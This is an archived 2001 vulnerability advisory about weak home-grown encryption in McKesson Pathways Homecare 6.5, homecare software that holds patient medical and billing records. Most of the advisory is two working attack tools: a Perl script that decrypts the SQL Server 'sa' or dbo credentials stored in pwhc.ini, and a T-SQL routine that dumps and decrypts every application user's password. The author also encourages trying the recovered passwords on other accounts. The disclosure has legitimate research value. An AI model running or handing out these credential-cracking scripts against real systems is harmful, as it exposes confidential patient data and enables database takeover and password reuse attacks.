TUCoPS :: Windows Apps :: win4913.htm

Pathways Homecare weak encryption
10th Dec 2001 [SBWID-4913]
COMMAND

	Pathways Homecare weak encryption

SYSTEMS AFFECTED

	Pathways Homecare 6.5

PROBLEM

	shoeboy posted :
	

	Users with access  to  certain  config  files  can  retrieve  \'sa\'  or
	equivalent account password  for  SQL  Server  7.0  (MSDE)  as  well  as
	retrieve application passwords for all users of the application.
	

	The full scoop:
	

	According to the vendor, McKesson\'s  Pathways  Homecare  is  the  first
	comprehensive  client/server  application  introduced  to  the  homecare
	market for advanced information management.
	

	Basically  is  stores  patient  information,  billing  information   and
	medical records for people who recieve health care in their homes.  Each
	clinician has a laptop and all the laptops are periodically synced  with
	a  central  database.  Additionally  there  is  a  desktop  client   for
	administrative staff. Both the laptops and the central  database  server
	run Microsoft SQL Server 7.0.
	

	Workstation and laptop users  alike  get  their  connection  information
	from a file named pwhc.ini which  contains  an  encrypted  username  and
	password. For workstations, the file is stored on a  central  fileserver
	and the account is likely to have dbo level permissions on  the  central
	database. For the laptops, this file is stored locally and  the  account
	used is either \'sa\' on the local version  of  SQL  or  has  equivalent
	permissions.
	

	As  you\'ve  probably  guessed  by  now,  the  vendor  (on  the  web  at
	www.mckesson.com ) decided to be clever and roll  their  own  encryption
	algorithm:
	

	First they determine whether the username/password is  even  or  odd  in
	length.  If  odd,  they  use  the   following   sequence   of   numbers:
	3,8,5,10,7... If even, the sequence is 7,4,9,6,11... Then  they  reverse
	the username/password and  subtract  the  corresponding  number  in  the
	sequence from each byte.
	

	That wasn\'t the best of explanations, so here\'s a bit of perl:
	 

	#! /usr/bin/perl -w

	

	################################################################################

	# pwhc_crack.pl -- Extracts a password from a Pathways Homecare PWHC.ini

	file

	################################################################################

	

	use strict;

	

	open (PWHC, \"pwhc.ini\") or die \"Unable to open .ini file\";

	while () {

	   chomp;

	   if ($_ =~ /^UserID/) { print \"UserID: \", decrypt($_), \"\\n\"; }

	   if ($_ =~ /^Password/) { print \"Password: \", decrypt($_), \"\\n\"; }

	}

	

	################################################################################

	# The sad thing is that this isn\'t the worst part of product.  It\'s not

	# that the vendor is using weak encryption, it\'s that the quality of

	# the encryption is better than most of their code.

	################################################################################

	

	

	sub decrypt {

	   my $counter = 0;

	   my $key;

	   my @cryptstr = split /=/, $_, 2;

	   my @revstr = unpack(\"c*\", (scalar reverse $cryptstr[1]));

	   if(@revstr % 2) {

	      $key = 3;

	      while ($counter < @revstr) {

	         $revstr[$counter] += $key;

	         $counter++;

	         $key += ($counter % 2) ? 5 : -3;

	      }

	   }

	   else {

	      $key = 7;

	      while ($counter < @revstr) {

	         $revstr[$counter] += $key;

	         $counter++;

	         $key += ($counter % 2) ? -3 : 5;

	      }

	   }

	   return pack(\"c*\", (reverse @revstr));

	}

	

	__END__

	

	

	So now anyone who can get  access  to  the  config  files  for  Pathways
	Homecare can read and modify confidential patient  information  as  well
	as enjoy sa priviliges on laptop clients,  but  they  still  can\'t  use
	McKesson\'s usability disaster of a VB client to access that data  in  a
	less inconvienent manner because it\'s protected  by  an  an  additional
	level of password protection.
	

	Unfortunately the vendor uses the  exact  same  encryption  method  with
	slightly different key sequences for this additional layer of  security.
	It\'s possible to retrieve the username and password for every  user  in
	about 2 seconds.  The T-SQL code to do this follows:
	 

	SET NOCOUNT ON

	DECLARE @evenkey varchar(15)

	DECLARE @oddkey varchar(15)

	DECLARE @key varchar(15)

	DECLARE @cryptstr varchar(15)

	DECLARE @position tinyint

	DECLARE @length tinyint

	DECLARE @usrid varchar(30)

	

	DECLARE pwd_cursor CURSOR FOR SELECT usrID, pwd FROM usr

	OPEN pwd_cursor

	FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr

	SET @evenkey = \'FDHFJHLJNLPNRP\'

	SET @oddkey = \'CGEIGKIMKOMQOSQ\'

	

	WHILE (@@FETCH_STATUS = 0)

	BEGIN

	SET @position = 1

	SET @length = datalength(@cryptstr)

	IF ((@length % 2) = 1) SET @key = @oddkey

	ELSE SET @key = @evenkey

	

	WHILE (@position <= @length)

	BEGIN

	   SET @cryptstr = STUFF(@cryptstr, (@length - @position) + 1, 1,

	       CHAR((ASCII(SUBSTRING(@key, @position, 1)) - 65)

	       + ASCII(SUBSTRING(@cryptstr, (@length - @position) + 1, 1))))

	   SET @position = @position + 1

	END

	PRINT @usrID + \' : \' + @cryptstr

	FETCH NEXT FROM pwd_cursor INTO @usrID, @cryptstr

	END

	DEALLOCATE pwd_cursor

	GO

	

	Bang! Out come the passwords and it\'s time to see if the user uses  the
	same password elsewhere.
	

	

	

SOLUTION

	Nothing yet

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH